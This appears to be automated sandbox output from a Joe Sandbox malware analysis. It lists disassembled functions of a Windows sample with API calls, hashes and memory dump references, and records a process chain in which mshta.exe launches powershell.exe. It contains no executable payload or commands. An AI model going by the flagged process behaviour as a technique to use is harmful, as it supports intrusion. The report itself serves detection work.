Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: CurrentHandleProcess$CloseDuplicate
String ID:
API String ID: 1410216518-0
Opcode ID: 4852cd940a62ffebd97bec63e7d75145fa92973f44f615ba9ebe136649e88543
Instruction ID: ce6dac3176af70590056e0be6dcfbc27d6d18e8bdc9d520293d6dd9450c8e6f1
Opcode Fuzzy Hash: 4852cd940a62ffebd97bec63e7d75145fa92973f44f615ba9ebe136649e88543
Instruction Fuzzy Hash: 73E0ED75608209BFEB10DF91DC49F9ABB7DEB44741F104065F905D2660EB71AD11CB64

Function 00402FAD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 193COMMON

Download Yara Rule

APIs

Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677

Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B

Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189

Part of subcall function 00405EB0: CharUpperW.USER32(00000000,00000000,FFFFFFF5,00001000,00001000,?,?,00001000,00402F92,00000000,00000008,00000001,00000000,00000000,00000000,00000000), ref: 00405F01

Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02130000,00000000,?), ref: 0040E599

Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(02130000,00000000,?,?), ref: 0040E5BC

Part of subcall function 00402E49: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402E71
Part of subcall function 00402E49: __fprintf_l.LIBCMT ref: 00402ECB

Part of subcall function 00409355: CoInitialize.OLE32(00000000), ref: 00409373
Part of subcall function 00409355: memset.MSVCRT ref: 00409381
Part of subcall function 00409355: LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040938E
Part of subcall function 00409355: GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 004093B0
Part of subcall function 00409355: GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 004093BC
Part of subcall function 00409355: wcsncpy.MSVCRT ref: 004093DD
Part of subcall function 00409355: wcslen.MSVCRT ref: 004093F1
Part of subcall function 00409355: CoTaskMemFree.OLE32(?), ref: 0040947A
Part of subcall function 00409355: wcslen.MSVCRT ref: 00409481
Part of subcall function 00409355: FreeLibrary.KERNEL32(00000000,00000000), ref: 004094A0

Part of subcall function 00403E37: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,-00000004,00403A0D,00000000,00000001,00000000,00000000,00000001,00000003,00000000), ref: 00403E67

PathAddBackslashW.SHLWAPI(00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000,00000000,FFFFFFF5,00000003,00000000,00000000,00000000,00000000,00000000), ref: 00403178

Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7

PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,02138BA0,00000000,00000000,00000200,00000000,00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000), ref: 004031DD

Part of subcall function 00402C55: FindResourceW.KERNEL32(?,0000000A,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402CF0

Strings

$pA, xrefs: 00403078

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: Value$FindResourcewcslen$AddressAllocateBackslashErrorFreeHeapLastLibraryPathProc$CharInitializeLoadRemoveTaskUpper__fprintf_lmemsetwcsncpy
String ID: $pA
API String ID: 790731606-4007739358
Opcode ID: 64ebd7b317967dc0aa4780699e57154d7a3f4f596edfabaaa6cc53898b52652e
Instruction ID: e60bee266b2990c05e42038f4eaf1cd2a2725b994cf9f5ea8c77fc408b4d2e90
Opcode Fuzzy Hash: 64ebd7b317967dc0aa4780699e57154d7a3f4f596edfabaaa6cc53898b52652e
Instruction Fuzzy Hash: 6851E6B9601204BEE500BBB39D82D7F266DDBC471CB108C3FB440A50D3E93CAE65662E

Function 0040249D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0040254F
PathRemoveArgsW.SHLWAPI(?), ref: 00402585

Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189

Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02130000,00000000,?), ref: 0040E599

Part of subcall function 004099A5: SetEnvironmentVariableW.KERNELBASE(02139760,02139760,00404594,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004099BE

Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B

Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7

Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402F99,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178

Part of subcall function 0040E5F0: HeapFree.KERNEL32(02130000,00000000,00000000,?,00000000,?,00412484,00000000,00000000,-00000008), ref: 0040E608

Strings

*pA, xrefs: 004025AB

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: Value$ErrorHeapLast$AllocateArgsCommandEnvironmentFreeLinePathRemoveVariablewcslen
String ID: *pA
API String ID: 1199808876-3833533140
Opcode ID: 978365ab2a22ce9fb3928a5ef7e0fcf4419ed98c8898819fe6a111c9215247d9
Instruction ID: beb9823a99ae011e4ed5f1d055ef6d1d692690281f772a57edd19b399da9bd76
Opcode Fuzzy Hash: 978365ab2a22ce9fb3928a5ef7e0fcf4419ed98c8898819fe6a111c9215247d9
Instruction Fuzzy Hash: E541E9B5504301BED600BBB39D8293F76A8EBC471CF508C3FB444A61D2EA3CD9655A2E

Function 0040973A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 0040D968: TlsGetValue.KERNEL32(?,00409869,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000,00000000,00000200), ref: 0040D96F
Part of subcall function 0040D968: HeapAlloc.KERNEL32(00000008,?,?,00409869,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D98A
Part of subcall function 0040D968: TlsSetValue.KERNEL32(00000000,?,?,00409869,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D999

GetCommandLineW.KERNEL32(?,?,?,00000000,?,?,00409870,00000000,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015), ref: 00409754

Strings

", xrefs: 00409776
, xrefs: 0040976E

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: Value$AllocCommandHeapLine
String ID: $"
API String ID: 1339485270-3817095088
Opcode ID: 9f13aeb594c8651f773918aba712108c6ee6300c7051426f9c00fbcbc60952a7
Instruction ID: 229198f1d41a65a6e9ffff917a794aecd7294c87f6384db1244c7b0cd665179e
Opcode Fuzzy Hash: 9f13aeb594c8651f773918aba712108c6ee6300c7051426f9c00fbcbc60952a7
Instruction Fuzzy Hash: 3131A6735252218ADB64AF10981127772A1EFA2B60F18C17FE4926B3C2F37D4D41D369

Function 0040A638 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 0040A66D
wcscmp.MSVCRT ref: 0040A6A6

Strings

$0A, xrefs: 0040A644

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: _wcsicmpwcscmp
String ID: $0A
API String ID: 3419221977-513306843
Opcode ID: e4c63d424049f42e7b73257686f90aee44a2e069d1a72a0e60c522d0a3ac157e
Instruction ID: a9c09230f7291aa91694be4cadd9aa4df44d847ede942287367b49c05577748a
Opcode Fuzzy Hash: e4c63d424049f42e7b73257686f90aee44a2e069d1a72a0e60c522d0a3ac157e
Instruction Fuzzy Hash: 39118F76508B018BD3209F56D440913B3F9EF94364329893FD88963790DB76EC658BAA

Function 00405700 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,00401218), ref: 00405722
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,?,00401218), ref: 00405746

Strings

$0A, xrefs: 0040570B

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: $0A
API String ID: 626452242-513306843
Opcode ID: 73ef42fd297e56149542e4ba10b5f7343afa2e9a126b30dcd6987e1077dc572a
Instruction ID: 6633c5b8762e659e7e7445bcc2ebba2587ddb8769fcb30c67f307584ac15d0df
Opcode Fuzzy Hash: 73ef42fd297e56149542e4ba10b5f7343afa2e9a126b30dcd6987e1077dc572a
Instruction Fuzzy Hash: D4F0653A38632137E230215A6C06F57295DC785F71F3542367B247F3D0C5B1680046BD

Function 0040DBFF Relevance: 5.1, APIs: 4, Instructions: 134memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,00000000,0040A724,00000000,00000001,?,?,?,00000000,0040A54C,?,?,00000000,?), ref: 0040DC13
HeapAlloc.KERNEL32(00000000,-00000018,00000001,?,?,00000000,0040A724,00000000,00000001,?,?,?,00000000,0040A54C,?,?), ref: 0040DCC8
HeapAlloc.KERNEL32(00000000,-00000018,?,?,00000000,0040A724,00000000,00000001,?,?,?,00000000,0040A54C,?,?,00000000), ref: 0040DCEB
LeaveCriticalSection.KERNEL32(?,?,00000000,0040A724,00000000,00000001,?,?,?,00000000,0040A54C,?,?,00000000,?,?), ref: 0040DD43

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: AllocCriticalHeapSection$EnterLeave
String ID:
API String ID: 830345296-0
Opcode ID: 324d660e7cdc21042891890593d34f1f0348325fed707f3f607e68598850c6a9
Instruction ID: 326a62a2d88e17b700e0b5dbbe6d23d3e5727d380a42910b8190cd6cec96877c
Opcode Fuzzy Hash: 324d660e7cdc21042891890593d34f1f0348325fed707f3f607e68598850c6a9
Instruction Fuzzy Hash: D151E570A04B069FD324CF69D980962B7F4FF587103148A3EE49A97A50D338F959CB94

Function 0040E7D0 Relevance: 5.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 0040E7E5
HeapAlloc.KERNEL32(02130000,00000000,0000000A), ref: 0040E809
HeapReAlloc.KERNEL32(02130000,00000000,00000000,0000000A), ref: 0040E82D
HeapFree.KERNEL32(02130000,00000000,00000000,?,?,0040506F,?,0041702E,00401095,00000000), ref: 0040E864

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: Heap$Alloc$Freewcslen
String ID:
API String ID: 2479713791-0
Opcode ID: 2b6b1bd9f026436857951278c42bc1b07c0eea740553c1e91eb77f15f4e50f5e
Instruction ID: 61d70e0538fde6a9b2f408d2d23f17b2afdd03d3414029a6c312abdd158bf447
Opcode Fuzzy Hash: 2b6b1bd9f026436857951278c42bc1b07c0eea740553c1e91eb77f15f4e50f5e
Instruction Fuzzy Hash: 6C2115B5604209EFCB04DF95D884FAAB7B9EB49354F10C169F8099B390D735EA81CB98

Function 0040DB18 Relevance: 5.1, APIs: 4, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000), ref: 0040DB23
HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?), ref: 0040DB63
LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040DB9E

Part of subcall function 0040E1F2: HeapAlloc.KERNEL32(00000008,00000000,0040DA6C,00418670,00000014,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040E1FE

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: AllocCriticalHeapSection$EnterLeave
String ID:
API String ID: 830345296-0
Opcode ID: 5d9d41e9d09ba23bc41a935226fc724bd5eb564a4c229014a10cb91462bf3418
Instruction ID: 234cd8b738bfcb23ec7c58dff1098e76d365aadfe99366d65fb7203dd4a6e8aa
Opcode Fuzzy Hash: 5d9d41e9d09ba23bc41a935226fc724bd5eb564a4c229014a10cb91462bf3418
Instruction Fuzzy Hash: 6A113D72504710AFC3208F68DC40D56BBFAEB48721B15892EE596E36A0CB34F844CB65

Function 0040DD5D Relevance: 5.0, APIs: 4, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040E03E,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200), ref: 0040DD6F
HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040E03E,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F), ref: 0040DD86
HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040E03E,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F), ref: 0040DDA2
LeaveCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040E03E,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200), ref: 0040DDBF

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: CriticalFreeHeapSection$EnterLeave
String ID:
API String ID: 1298188129-0
Opcode ID: b3beb58b6f71b40006eb08016dd7c334f266477d507c334884bffe37f11cccde
Instruction ID: 339acd6113cd15283fdaf2d24efa5c6700350868ea18a16039eb98c455fe0077
Opcode Fuzzy Hash: b3beb58b6f71b40006eb08016dd7c334f266477d507c334884bffe37f11cccde
Instruction Fuzzy Hash: 7C012C71A0161ABFC7108F96ED049A7FB78FF49751345817AA804A7664D734E824CFE8

Function 0040A54F Relevance: 5.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A79A: memset.MSVCRT ref: 0040A802

Part of subcall function 0040DFC6: EnterCriticalSection.KERNEL32(00418684,00000200,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3), ref: 0040DFDA
Part of subcall function 0040DFC6: HeapFree.KERNEL32(00000000,?,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004), ref: 0040E028
Part of subcall function 0040DFC6: LeaveCriticalSection.KERNEL32(00418684,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040E02F

HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 0040A57A
HeapFree.KERNEL32(00000000,?,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A586
HeapFree.KERNEL32(00000000,?,?,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 0040A59A
HeapFree.KERNEL32(00000000,00000000,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A5B0

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: FreeHeap$CriticalSection$EnterLeavememset
String ID:
API String ID: 4254243056-0
Opcode ID: 9b91829c39ba2b5ec3bef2853771c0dd8412306e6433636457154be9583086ba
Instruction ID: 62ba4ec21453903b754b53d00370c9fddb20f7a3713721c865cfde946388869e
Opcode Fuzzy Hash: 9b91829c39ba2b5ec3bef2853771c0dd8412306e6433636457154be9583086ba
Instruction Fuzzy Hash: B5F04471105209BFC6125B16DD40C57BF7DFF49798342412AB40463570CB36ED75DBA8

Analysis Process: mshta.exePID: 3156, Parent PID: 8104COMMON

Executed Functions

Function 0000019DCBBC0FC1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000003.2453483759.0000019DCBBC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000019DCBBC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_3_19dcbbc0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 752522a719cd3ce211ed20bb998873e33e7fb0b5d2679d64c3d14745eba80ff9
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 9C9004144D554755DC1457D11C557FC514573CC350FD444D44417D0144D44D43D7F353

Analysis Process: mshta.exePID: 2412, Parent PID: 1848COMMON

Executed Functions

Function 06090FE7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000003.2455793072.0000000006090000.00000010.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_3_6090000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
Instruction ID: 1280181dba44629508f7239ebd82fa5499be332319fe2aa3cbaa3e1469724601
Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
Instruction Fuzzy Hash:

Analysis Process: powershell.exePID: 7484, Parent PID: 3156COMMON

Executed Functions

Function 00007FFD99EA3475 Relevance: .4, Instructions: 442COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2554204639.00007FFD99EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd99ea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8277fd34cb3a868c1d8ece3eee05df20d3cf9fa4fb1d5b2034708722b934f3e9
Instruction ID: ddf6d7e42a0e83c947c3f8b3895662e8231d5d3ba60191019d4b32ec30ca31f5
Opcode Fuzzy Hash: 8277fd34cb3a868c1d8ece3eee05df20d3cf9fa4fb1d5b2034708722b934f3e9
Instruction Fuzzy Hash: A8D12BA2A0FAC90FE766EFA848A55B5BBD1EF55314B0801FED05DC71E3D919AC01C352

Function 00007FFD99EA0919 Relevance: .4, Instructions: 411COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2554204639.00007FFD99EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd99ea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3b772adcaf165649c77432a9043aab5f673350f42177c590048f0d68b149fc2
Instruction ID: 8eca6167c0ca4c2abd0419509ae52914201c2a3447f8842cf3d0a27d1abeeb04
Opcode Fuzzy Hash: f3b772adcaf165649c77432a9043aab5f673350f42177c590048f0d68b149fc2
Instruction Fuzzy Hash: ADC12772B0FB890FE7A99A6848B55B57BD1EF57319B0801FED05DC70E3E91A6C068342

Function 00007FFD99EA2AF3 Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2554204639.00007FFD99EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd99ea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4afa35f298529778aec53effbdd9df3fa2882ace42d6e13c6543741a471bee7f
Instruction ID: 4f49f2ae0e3f7055c87d98bd51e8d46caca9490797f6cce23b1b9952fbd575b9
Opcode Fuzzy Hash: 4afa35f298529778aec53effbdd9df3fa2882ace42d6e13c6543741a471bee7f
Instruction Fuzzy Hash: D7810362A0FBC50FEB669BB858B45B07FE1DF56214B0901FBD488DB1E3D909A806C352

Function 00007FFD99EA2B0A Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2554204639.00007FFD99EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd99ea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f763589d14ac81f7a7749e10e642f6e5346ed736ab73054dbe258dc67990f0d
Instruction ID: 74e7d32038868ce2c13c99cebfc7f8140027bab6739d148a70171951ab50ce93
Opcode Fuzzy Hash: 0f763589d14ac81f7a7749e10e642f6e5346ed736ab73054dbe258dc67990f0d
Instruction Fuzzy Hash: 8861A05194F7C50FEB639BB849B85A13FE19F57224B0E01EBD488DB1A3D90E680AC353

Function 00007FFD99EA0A29 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2554204639.00007FFD99EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd99ea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e69b58cc72c772bd18ee2078589aa5d408693d37d9130ad62912ee6c9a6da11
Instruction ID: 00fc017200be936cb690848836223ef459f3f450988e4d12a3f0c6fdc26d77fb
Opcode Fuzzy Hash: 7e69b58cc72c772bd18ee2078589aa5d408693d37d9130ad62912ee6c9a6da11
Instruction Fuzzy Hash: 6021F9B2F0FA864FE3B4EE6858B15B866C1EF42269B5801BAD05DC71E7DD1AAC014343

Function 00007FFD99DD37B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2551677424.00007FFD99DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd99dd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: 7ce2d19235dbfe2577fd0da60b7dae7f85481e9833d0dacc96a5247999f8ac1f
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
